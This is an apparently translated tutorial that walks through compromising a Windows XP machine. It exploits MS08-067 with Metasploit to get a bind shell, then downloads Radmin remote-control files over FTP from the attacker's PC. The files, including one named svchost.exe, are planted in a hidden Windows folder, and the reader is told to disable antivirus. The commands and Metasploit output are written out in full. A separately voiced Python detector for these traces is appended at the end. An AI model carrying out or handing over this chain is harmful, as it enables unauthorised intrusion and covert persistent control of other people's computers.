Any Windows XP (SP2, SP3).
Virtual machine - VMware.
Download and install the VMware virtual machine software.
Create a new machine in VMware: press CTRL+N and follow the instructions,
then go to Edit => "Virtual Network Setting" and open the "Host Virtual Adapter" tab.
Click Add and create as many virtual adapters as you need. Then go to DHCP and delete all the adapters from there except VMnet1 and VMnet8. At this point you can click Accept and OK, or go to Host Virtual Network Mapping and configure each adapter with your own IP; if you do not, addresses will be assigned automatically.
Open the virtual machine settings with CTRL+D, go to the "Ethernet" tab, select "Custom: Specific virtual network" and assign any interface you like except, of course, VMnet1 and VMnet8. I chose VMnet2.
Now go to the CD-ROM settings, tick "Use ISO image", click Browse and select the image from which you will install Windows. You can also install from a disc by selecting "Use physical drive" and choosing the appropriate drive.
Now start the virtual machine and press F12. If you have configured everything correctly, you get the setup screen.
Now we can set up a local network between the real and the virtual PC.
Necessary software:
FTP server (Serv-U)
After installation, you must configure the network between the real and the virtual PC. To do this, open the properties of the network connection for the virtual adapter you selected on the Ethernet tab; in my case it is VMnet2.
IP address 192.168.1.3
Now boot the virtual machine, go to its network connections as well, and look at the TCP/IP properties.
IP address 192.168.1.10
Now we put the FTP server on our real PC. Choose Serv-U; it is easy.
Create a user without a password. Put FTP on the standard port 21 and use the FTP protocol.
Sample:
Radmin Viewer 3
Scan the PC with the X-Spider scanner.
We break in using a vulnerability in the Server service (ms08_067). Run Metasploit 3 Web and, when it has loaded, enter in the browser: 127.0.0.1:55555
use windows/smb/ms08_067_netapi; our exploit
set PAYLOAD generic/shell_bind_tcp ; choose the payload
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; host victim
RHOST => 192.168.1.10
set LPORT 7777 ; local port
LPORT => 7777
set RPORT 445 ; remote port
RPORT => 445
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
A command prompt is now open on the remote system.
(create the folder helps in the windows folder)
cd c:\windows
(connect to our PC)
User (192.168.1.3:(none)): kerny
(the connection succeeds; go to c:\kerny\ on your FTP server, where Radmin is)
cd c:\kerny\
drw-rw-rw-1 user group 0 Mar 2 20:10.
drw-rw-rw-1 user group 0 Mar 2 20:10 ..
-rw-rw-rw-1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:10 svchost.exe
(put the files on the victim's PC in the folder windows\helps)
get 111.bat c:\windows\helps\111.bat
get 111.reg c:\windows\helps\111.reg
get AdmDll.dll c:\windows\helps\AdmDll.dll
get raddrv.dll c:\windows\helps\raddrv.dll
get svchost.exe c:\windows\helps\svchost.exe
(log off from our FTP)
(go to the folder and check whether the files were downloaded)
cd c:\windows\helps
-rw-rw-rw-1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:12 svchost.exe
(install Radmin on the victim)
Now run Radmin Viewer and connect.
Video + soft:
Important: Turn Antivirus off OR download on the virtual machine!!
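Seen from the monitored host, the session above leaves two recognisable traces: a command shell started by the process that hosts the Server service, and a file named svchost.exe running from c:\windows\helps instead of System32. The following is an added example, not part of the original walkthrough, that flags both in process-creation records; the "time|host|parent|image" record format, the host name and the sample lines are constructed assumptions.

```python
import ntpath

# System binary names that should only run from System32 (short illustrative list).
PROTECTED_NAMES = {"svchost.exe", "lsass.exe", "services.exe", "winlogon.exe"}
EXPECTED_DIR = r"c:\windows\system32"

# Constructed sample records in an assumed "time|host|parent|image" format.
SAMPLE_LOG = r"""
20:09:41|XP-VM|C:\WINDOWS\system32\services.exe|C:\WINDOWS\system32\svchost.exe
20:11:02|XP-VM|C:\WINDOWS\system32\svchost.exe|C:\WINDOWS\system32\cmd.exe
20:11:30|XP-VM|C:\WINDOWS\system32\cmd.exe|C:\WINDOWS\system32\ftp.exe
20:13:05|XP-VM|C:\WINDOWS\system32\cmd.exe|C:\WINDOWS\helps\svchost.exe
"""

def parse(log):
    """Yield one dict per well-formed record; malformed lines are skipped."""
    for line in log.strip().splitlines():
        parts = line.split("|")
        if len(parts) == 4:
            yield dict(zip(("time", "host", "parent", "image"), parts))

def masquerading(rec):
    """True when a protected system binary name runs outside System32."""
    image = ntpath.normpath(rec["image"]).lower()
    return (ntpath.basename(image) in PROTECTED_NAMES
            and ntpath.dirname(image) != EXPECTED_DIR)

def shell_from_service_host(rec):
    """True when cmd.exe is a child of svchost.exe.

    The Server service is hosted in svchost.exe, so a command shell obtained
    through it typically shows up with svchost.exe as its parent.
    """
    parent = ntpath.basename(rec["parent"]).lower()
    image = ntpath.basename(rec["image"]).lower()
    return parent == "svchost.exe" and image == "cmd.exe"

def findings(log):
    """Return (rule, time, image) tuples for every suspicious record."""
    out = []
    for rec in parse(log):
        if masquerading(rec):
            out.append(("masquerade", rec["time"], rec["image"]))
        elif shell_from_service_host(rec):
            out.append(("service-shell", rec["time"], rec["image"]))
    return out

if __name__ == "__main__":
    for rule, when, image in findings(SAMPLE_LOG):
        print(f"{when} {rule:14} {image}")
```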